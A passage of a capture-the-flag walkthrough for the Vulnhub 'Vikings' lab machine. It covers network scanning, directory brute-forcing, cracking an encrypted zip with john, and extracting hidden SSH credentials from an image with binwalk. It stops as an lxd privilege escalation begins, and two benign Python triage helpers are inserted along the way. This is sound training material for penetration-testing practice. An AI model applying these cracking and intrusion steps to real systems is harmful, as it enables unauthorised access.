Vulnhub: Vikings machine, a super detailed test walkthrough

Vikings

Author: jason_huawen

Basic information about the target machine

Name: Vikings: 1

Address:

https://www.vulnhub.com/entry/vikings-1,741/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ sudo netdiscover -i eth1

Currently scanning: 172.16.137.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:89:29:07      2     120  PCS Systemtechnik GmbH                                                   
 192.168.56.126  08:00:27:09:9a:d1      1      60  PCS Systemtechnik GmbH    

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.126.

NMAP scan

First, use NMAP to run a full-port scan of the target host:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.126 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-09 00:23 EST
Nmap scan report for bogon (192.168.56.126)
Host is up (0.00036s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 59:d4:c0:fd:62:45:97:83:15:c0:15:b2:ac:25:60:99 (RSA)
|   256 7e:37:f0:11:63:80:15:a3:d3:9d:43:c6:09:be:fb:da (ECDSA)
|_  256 52:e9:4f:71:bc:14:dc:00:34:f2:a7:b3:58:b5:0d:ce (ED25519)
80/tcp open  http    Apache httpd 2.4.29
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2020-10-29 21:07  site/
|_
|_http-title: Index of /
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:09:9A:D1 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.67 seconds

The NMAP scan results show that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).

Getting a shell

Since the target's SSH service has no exploitable vulnerability, the next step is to focus on information gathering against the HTTP service:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126                         
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="site/">site/</a></td><td align="right">2020-10-29 21:07  </td><td align="right">  - </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.126 Port 80</address>
</body></html>
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.126 Port 80</address>
</body></html>
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.126/site/">here</a>.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.126 Port 80</address>
</body></html>
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site/
<!DOCTYPE html>
<!--  This site was created in Webflow. http://www.webflow.com  -->
<!--  Last Published: Fri May 01 2020 14:48:48 GMT+0000 (Coordinated Universal Time)  -->
<html data-wf-page="5ea837e8c81001b668dffd4a" data-wf-site="5ea837e8c8100167b2dffd49">
<head>
  <meta charset="utf-8">
  <title>Split</title>
  <meta content="width=device-width, initial-scale=1" name="viewport">
  <meta content="Webflow" name="generator">
  <link href="css/normalize.css" rel="stylesheet" type="text/css">
  <link href="css/webflow.css" rel="stylesheet" type="text/css">
  <link href="css/split-opl.webflow.css" rel="stylesheet" type="text/css">
  <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
  <script type="text/javascript">WebFont.load({  google: {    families: ["Inter:regular,600","Lora:regular"]  }});</script>
  <!-- [if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"></script><![endif] -->
  <script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script>
  <link href="images/favicon.png" rel="shortcut icon" type="image/x-icon">
  <link href="images/webclip.jpg" rel="apple-touch-icon">
  <style type="text/css">
body {
  -webkit-font-smoothing: antialiased;
}      
</style>
</head>
<body class="body">
  <div class="columns w-row">
    <div class="leftcontent w-col w-col-6 w-col-stack">
      <div data-w-id="b84f5156-c6e2-fb1d-6606-98a08030a472" style="opacity:0" class="image"></div>
    </div>
    <div class="rightcontent w-col w-col-6 w-col-stack">
      <div data-w-id="3fd5aeb3-22da-ed60-7286-0d11f16597d3" style="opacity:0" class="content">
        <div class="name">Ivar The Boneless</div>
        <h1 class="tagline"><strong class="bold-text">Mad King</strong></h1>
        <p class="bio">865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)</p>
        <div class="links w-row">
          <div class="column w-col w-col-4">
            <div class="text-block-2">Connect</div>
            <ul class="list w-list-unstyled">
              <li><a href="#">Blog</a></li>
              <li><a href="#">Email</a></li>
              <li><a href="#">Newsletter</a></li>
            </ul>
          </div>
          <div class="column-2 w-col w-col-4">
            <div class="text-block-2">social</div>
            <ul class="list w-list-unstyled">
              <li><a href="#">Twitter</a></li>
              <li><a href="#">Instagram</a></li>
              <li><a href="#">Dribbble</a></li>
            </ul>
          </div>
          <div class="w-col w-col-4">
            <div class="text-block-2">network</div>
            <ul class="list w-list-unstyled">
              <li><a href="#">Link One</a></li>
              <li><a href="#">Link Two</a></li>
              <li><a href="#">Link Three</a></li>
            </ul>
          </div>
        </div>
        <div class="credit">©2020 Ivar The Boneless</div>
      </div>
    </div>
  </div>
  <script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.4.1.min.220afd743d.js?site=5ea837e8c8100167b2dffd49" type="text/javascript" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>
  <script src="js/webflow.js" type="text/javascript"></script>
  <!-- [if lte IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/placeholders/3.0.2/placeholders.min.js"></script><![endif] -->
</body>
</html>                                          
                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ nikto -h http://192.168.56.126/site/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.126
+ Target Hostname:    192.168.56.126
+ Target Port:        80
+ Start Time:         2022-12-09 02:56:40 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Server may leak inodes via ETags, header found with file /site/, inode: 1143, size: 5b2d5ac892300, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ OSVDB-3268: /site/css/: Directory indexing found.
+ OSVDB-3092: /site/css/: This might be interesting...
+ OSVDB-3268: /site/images/: Directory indexing found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2022-12-09 02:56:54 (GMT-5) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Browsing the /site/images directory shows 3 images; download them locally:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ steghide extract -sf split.jpg      
Enter passphrase: 
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ stegseek split.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.22% (132.4 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ steghide extract -sf webclip.jpg 
Enter passphrase: 
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ stegseek webclip.jpg 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.44% (132.7 MB)           
[!] error: Could not find a valid passphrase.
                                                         

It looks like these images are of no use, so next scan the target host for directories and files:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ gobuster dir -u http://192.168.56.126/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.126/site/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/09 03:00:04 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 322] [--> http://192.168.56.126/site/images/]
/css                  (Status: 301) [Size: 319] [--> http://192.168.56.126/site/css/]
/js                   (Status: 301) [Size: 318] [--> http://192.168.56.126/site/js/]
Progress: 218385 / 220561 (99.01%)===============================================================
2022/12/09 03:00:31 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ gobuster dir -u http://192.168.56.126/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.126/site/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,html,sh
[+] Timeout:                 10s
===============================================================
2022/12/09 03:00:43 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 322] [--> http://192.168.56.126/site/images/]
/index.html           (Status: 200) [Size: 4419]
/css                  (Status: 301) [Size: 319] [--> http://192.168.56.126/site/css/]
/js                   (Status: 301) [Size: 318] [--> http://192.168.56.126/site/js/]
/war.txt              (Status: 200) [Size: 13]
/.html                (Status: 403) [Size: 279]
Progress: 1101000 / 1102805 (99.84%)===============================================================
2022/12/09 03:03:03 Finished
===============================================================

The /war.txt file was discovered; access it:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site/war.txt
/war-is-over

The war.txt file contains a directory. Accessing that directory returns encoded content; download it locally:

Strangely, copying the page content from the browser into vim seemed to enter an endless loop, with the paste never finishing. Change approach: rather than copying directly from the web page, use the curl command and redirect the output:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site/war-is-over/ > bigtext    

It looks like base64 encoding, so decode it:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ cat bigtext | base64 -d > decoded

Running cat on the decoded file shows garbage; checking it with the file command reveals it is a zip file:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls                                                                                     
bigtext  decoded  nmap_full_scan  split.jpg  webclip.jpg
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ file decoded 
decoded: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ mv decoded decoded.zip                                
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ unzip decoded.zip    
Archive:  decoded.zip
   skipping: king                    need PK compat. v5.1 (can do v4.6)
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls
bigtext  decoded.zip  nmap_full_scan  split.jpg  webclip.jpg
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ zip2john decoded.zip > zip_hash        
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls
bigtext  decoded.zip  nmap_full_scan  split.jpg  webclip.jpg  zip_hash
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 1410760 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ragnarok123      (decoded.zip/king)     
1g 0:00:00:09 DONE (2022-12-09 03:19) 0.1107g/s 33112p/s 33112c/s 33112C/s redsox#1..money66
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                

With the zip file's password obtained, extract decoded.zip: (extracting with terminal commands had some issues, so I used Extract in the graphical interface directly and entered the password)

This yields the file king, which is an image.

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ file king   
king: JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=14, height=4000, bps=0, PhotometricIntepretation=RGB, description=Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 100901071, orientation=upper-left, width=6000], baseline, precision 8, 1600x1067, components 3
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ steghide extract -sf king           
Enter passphrase: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ stegseek king            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.62% (132.9 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ exiftool king           
ExifTool Version Number         : 12.44
File Name                       : king
Directory                       : .
File Size                       : 1430 kB
File Modification Date/Time     : 2021:09:03 06:30:03-04:00
File Access Date/Time           : 2022:12:09 03:27:07-05:00
File Inode Change Date/Time     : 2022:12:09 03:26:48-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Photometric Interpretation      : RGB
Image Description               : Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 1009010713
Orientation                     : Horizontal (normal)
Samples Per Pixel               : 3
X Resolution                    : 300
Y Resolution                    : 300
Resolution Unit                 : inches
Software                        : Adobe Photoshop CC 2019 (Windows)
Modify Date                     : 2018:11:26 10:32:02
Artist                          : vlastas
Exif Version                    : 0221
Color Space                     : Uncalibrated
Exif Image Width                : 1600
Exif Image Height               : 1067
Compression                     : JPEG (old-style)
Thumbnail Offset                : 558
Thumbnail Length                : 5613
Current IPTC Digest             : 73f42d7d127f00bdd0e556910f4a85a8
Coded Character Set             : UTF8
Application Record Version      : 4
Caption-Abstract                : Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 1009010713
By-line                         : vlastas
Object Name                     : 1009010713
Original Transmission Reference : 53616c7465645f5f0f79ebad28071734
Keywords                        : 3d, ancient, attack, battle, boat, culture, dark, denmark, drakkar, dramatic, dusk, engraved, evening, history, illustration, invasion, leadership, longboat, men, nautical, nordic, norse, north, northern, norway, occupation, river, sail, sailboat, scandinavian, shield, ship, storm, stormy, sun, sunbeam, sunlight, sunrise, sunset, vandal, vessel, viking, viking ship, war, warrior, water, weather, wind, windstorm, wooden
IPTC Digest                     : 73f42d7d127f00bdd0e556910f4a85a8
Displayed Units X               : inches
Displayed Units Y               : inches
Print Style                     : Centered
Print Position                  : 0 0
Print Scale                     : 1
Global Angle                    : 30
Global Altitude                 : 30
URL List                        : 
Slices Group Name               : viking021
Num Slices                      : 1
Pixel Aspect Ratio              : 1
Photoshop Thumbnail             : (Binary data 5613 bytes, use -b option to extract)
Has Real Merged Data            : Yes
Writer Name                     : Adobe Photoshop
Reader Name                     : Adobe Photoshop CC 2019
Photoshop Quality               : 12
Photoshop Format                : Standard
Progressive Scans               : 3 Scans
XMP Toolkit                     : Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22
Format                          : image/jpeg
Legacy IPTC Digest              : 250DA4DEC6F34E708125EF03F795F091
Transmission Reference          : 53616c7465645f5f0f79ebad2807173403390e2bb3edd8e2c4479d390bd71e50
Credit                          : Shutterstock / vlastas
Source                          : Shutterstock
Color Mode                      : RGB
ICC Profile Name                : 
Document ID                     : adobe:docid:photoshop:2d821c53-a3ca-e346-80f6-118a95cc9817
Instance ID                     : xmp.iid:5bef0ca9-3ef9-e44f-865c-f39bdc472764
Original Document ID            : A609744630A618A935A1D637005C673F
Create Date                     : 2018:11:26 10:28:18-06:00
Metadata Date                   : 2018:11:26 10:32:02-06:00
Creator Tool                    : Adobe Photoshop CC 2019 (Windows)
Description                     : Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 1009010713
Title                           : 1009010713
Subject                         : 3d, ancient, attack, battle, boat, culture, dark, denmark, drakkar, dramatic, dusk, engraved, evening, history, illustration, invasion, leadership, longboat, men, nautical, nordic, norse, north, northern, norway, occupation, river, sail, sailboat, scandinavian, shield, ship, storm, stormy, sun, sunbeam, sunlight, sunrise, sunset, vandal, vessel, viking, viking ship, war, warrior, water, weather, wind, windstorm, wooden
Creator                         : vlastas
History Action                  : saved, converted, derived, saved, saved, converted, derived, saved
History Instance ID             : xmp.iid:642d0712-667d-2d43-8e5e-dcde3e7be5bf, xmp.iid:f9584b87-136c-8c43-8d2b-121dfc42e1c3, xmp.iid:f312a9e4-c83e-5046-b32f-7d31285efcc6, xmp.iid:5bef0ca9-3ef9-e44f-865c-f39bdc472764
History When                    : 2018:11:26 10:31:55-06:00, 2018:11:26 10:31:55-06:00, 2018:11:26 10:32:02-06:00, 2018:11:26 10:32:02-06:00
History Software Agent          : Adobe Photoshop CC 2019 (Windows), Adobe Photoshop CC 2019 (Windows), Adobe Photoshop CC 2019 (Windows), Adobe Photoshop CC 2019 (Windows)
History Changed                 : /, /, /, /
History Parameters              : from image/jpeg to image/tiff, converted from image/jpeg to image/tiff, from image/tiff to image/jpeg, converted from image/tiff to image/jpeg
Derived From Instance ID        : xmp.iid:f312a9e4-c83e-5046-b32f-7d31285efcc6
Derived From Document ID        : adobe:docid:photoshop:a311ad0b-1bf9-f446-b96f-1960b71bb9bf
Derived From Original Document ID: A609744630A618A935A1D637005C673F
DCT Encode Version              : 100
APP14 Flags 0                   : [14]
APP14 Flags 1                   : (none)
Color Transform                 : YCbCr
Image Width                     : 1600
Image Height                    : 1067
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1600x1067
Megapixels                      : 1.7
Thumbnail Image                 : (Binary data 5613 bytes, use -b option to extract)

The Transmission Reference in the image metadata looks a bit odd:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 53616c7465645f5f0f79ebad2807173403390e2bb3edd8e2c4479d390bd71e50

Possible Hashs:
[+] SHA-256
[+] Haval-256

Least Possible Hashs:
[+] GOST R 34.11-94
[+] RipeMD-256
[+] SNEFRU-256
[+] SHA-256(HMAC)
[+] Haval-256(HMAC)
[+] RipeMD-256(HMAC)
[+] SNEFRU-256(HMAC)
[+] SHA-256(md5($pass))
[+] SHA-256(sha1($pass))
--------------------------------------------------
 HASH: ^C

     Bye!
                                    

Attempts to crack this SHA256 with online sites all failed. This part was a bit of a detour, although the overall direction was not wrong.
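A 64-hex-digit value has the length of a SHA-256 digest, which is essentially all hash-identifier goes on, but the first eight bytes here, 53616c7465645f5f, are the ASCII string Salted__, the header that openssl enc writes in front of salted ciphertext, so the value is an encrypted blob rather than a digest and no hash cracker will ever match it. The following Python triage helper is added here and is not part of the original walkthrough; it checks for that header before falling back to length-based digest guessing.

```python
# Triage helper: is a hex value a digest, or something else of the same length?
DIGEST_SIZES = {16: "MD5-sized", 20: "SHA-1-sized", 32: "SHA-256-sized", 64: "SHA-512-sized"}
OPENSSL_MAGIC = b"Salted__"   # 8-byte header written by `openssl enc -salt` before the ciphertext


def classify_hex_value(hexstr):
    """Return a dict describing what the hex string most plausibly is."""
    try:
        raw = bytes.fromhex(hexstr.strip())
    except ValueError:
        return {"kind": "not-hex"}
    if raw.startswith(OPENSSL_MAGIC) and len(raw) >= 16:
        body = raw[16:]                      # magic (8) + salt (8) precede the ciphertext
        return {
            "kind": "openssl-salted",
            "salt": raw[8:16].hex(),
            "ciphertext_len": len(body),
            # CBC output of a 16-byte-block cipher (e.g. AES) is always block aligned
            "block_aligned": len(body) % 16 == 0,
        }
    # Plain digest candidates are distinguished only by length, as hash-identifier does
    return {"kind": DIGEST_SIZES.get(len(raw), "unknown-length"), "length": len(raw)}


# Value from the image's Transmission Reference field, as printed by exiftool above
TRANSMISSION_REFERENCE = "53616c7465645f5f0f79ebad2807173403390e2bb3edd8e2c4479d390bd71e50"

if __name__ == "__main__":
    print(classify_hex_value(TRANSMISSION_REFERENCE))
```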

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ binwalk -e king

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, EXIF standard
12            0xC             TIFF image data, big-endian, offset of first image directory: 8
1429567       0x15D03F        Zip archive data, at least v2.0 to extract, compressed size: 53, uncompressed size: 92, name: user
1429740       0x15D0EC        End of Zip archive, footer length: 22

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls     
bigtext  decoded.zip  image_hash  king  _king.extracted  nmap_full_scan  split.jpg  webclip.jpg  zip_hash
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ cd _king.extracted 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings/_king.extracted]
└─$ ls
15D03F.zip  user
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings/_king.extracted]
└─$ cat user                 
//FamousBoatbuilder_floki@vikings                                     
//f@m0usboatbuilde7 
                                             

Using the binwalk tool, a user file was found inside the image, containing a username and password.
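Both archive-identification steps above, the base64 body that file reported as an AES-encrypted zip needing v5.1, and the zip that binwalk found appended to the JPEG at offset 0x15D03F, come down to reading a zip local file header. The following Python script is added here and is not part of the original walkthrough; it parses that header and applies it to both cases, and every input it uses is a constructed sample rather than the real files from the machine.

```python
import base64
import io
import struct
import zipfile

# Zip local file header: signature, version needed, flags, method, mod time,
# mod date, crc32, compressed size, uncompressed size, name length, extra length
LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")
ZIP_SIG = b"PK\x03\x04"


def parse_local_header(data, offset=0):
    """Parse the zip local file header at `offset`; None if there is none."""
    if len(data) < offset + LOCAL_HDR.size:
        return None
    (sig, version, flags, method, _mtime, _mdate, _crc,
     csize, usize, nlen, xlen) = LOCAL_HDR.unpack_from(data, offset)
    if sig != ZIP_SIG:
        return None
    name_start = offset + LOCAL_HDR.size
    name = data[name_start:name_start + nlen]
    if len(name) != nlen:
        return None
    return {
        "name": name.decode("utf-8", "replace"),
        # 51 -> "5.1", which file/unzip report as "need PK compat. v5.1"
        "version_needed": f"{version // 10}.{version % 10}",
        "encrypted": bool(flags & 0x0001),   # general-purpose flag bit 0
        "aes": method == 99,                  # WinZip AE-x encryption marker
        "method": method,
        "compressed_size": csize,
        "uncompressed_size": usize,
        "data_offset": name_start + nlen + xlen,
    }


def inspect_base64_blob(text):
    """Decode a base64 body (as fetched with curl) and describe the zip header, if any."""
    try:
        raw = base64.b64decode("".join(text.split()), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    return parse_local_header(raw)


def find_appended_zip(jpeg):
    """Locate a zip archive appended after the JPEG image data (what binwalk flagged)."""
    if not jpeg.startswith(b"\xff\xd8"):
        return None
    # An EXIF/Photoshop thumbnail carries its own FFD9 end-of-image marker, so rather
    # than trusting the first EOI we accept the first parseable local header after any EOI.
    eoi = jpeg.find(b"\xff\xd9")
    if eoi == -1:
        return None
    pos = jpeg.find(ZIP_SIG, eoi + 2)
    while pos != -1:
        header = parse_local_header(jpeg, pos)
        if header is not None:
            return pos, header
        pos = jpeg.find(ZIP_SIG, pos + 1)
    return None


# --- constructed samples (not the files from the walkthrough) ---

# Local header shaped like the AES-encrypted archive: version 5.1, encrypted flag set,
# method 99 with a WinZip AES extra field (id 0x9901, AE-2, AES-256, deflate inside).
AES_EXTRA = b"\x01\x99\x07\x00\x02\x00AE\x03\x08\x00"
AES_HEADER = (LOCAL_HDR.pack(ZIP_SIG, 51, 0x0001, 99, 0, 0, 0, 0x55, 0x40, 4, len(AES_EXTRA))
              + b"king" + AES_EXTRA)
BIGTEXT = base64.b64encode(AES_HEADER + b"\x00" * 0x55).decode()

# Minimal JPEG-like prefix (SOI, one APP0 segment, EOI) followed by a plain zip holding "user".
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w", zipfile.ZIP_STORED) as zf:
    zf.writestr("user", "constructed sample content\n")
FAKE_JPEG_PREFIX = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 9 + b"\xff\xd9"
POLYGLOT = FAKE_JPEG_PREFIX + _buf.getvalue()

if __name__ == "__main__":
    print(inspect_base64_blob(BIGTEXT))
    print(find_appended_zip(POLYGLOT))
```

On the real files the same two calls would be fed the downloaded bigtext and the bytes of king.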

┌──(kali㉿kali)-[~/Vulnhub/Vikings/_king.extracted]
└─$ ssh floki@192.168.56.126        
The authenticity of host '192.168.56.126 (192.168.56.126)' can't be established.
ED25519 key fingerprint is SHA256:volom5GRMcetvgfJsyVTXVnNY0FUA6W1k/5fsdHs9T4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.126' (ED25519) to the list of known hosts.
floki@192.168.56.126's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Dec  9 08:37:30 UTC 2022

  System load:  0.0               Processes:             95
  Usage of /:   53.5% of 8.79GB   Users logged in:       0
  Memory usage: 39%               IP address for enp0s3: 192.168.56.126
  Swap usage:   0%


0 updates can be applied immediately.


You have mail.
Last login: Sat Sep  4 04:38:04 2021 from 10.42.0.1
floki@vikings:~$ id
uid=1000(floki) gid=1000(floki) groups=1000(floki),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)
floki@vikings:~$ 

Privilege escalation

From the id command we know that floki is a member of the lxd group, so next we use lxd/lxc privileges to escalate.

Upload the alpine-v3.13-x86_64-20210218_0139.tar.gz file to the target machine (this file can be downloaded from the internet):

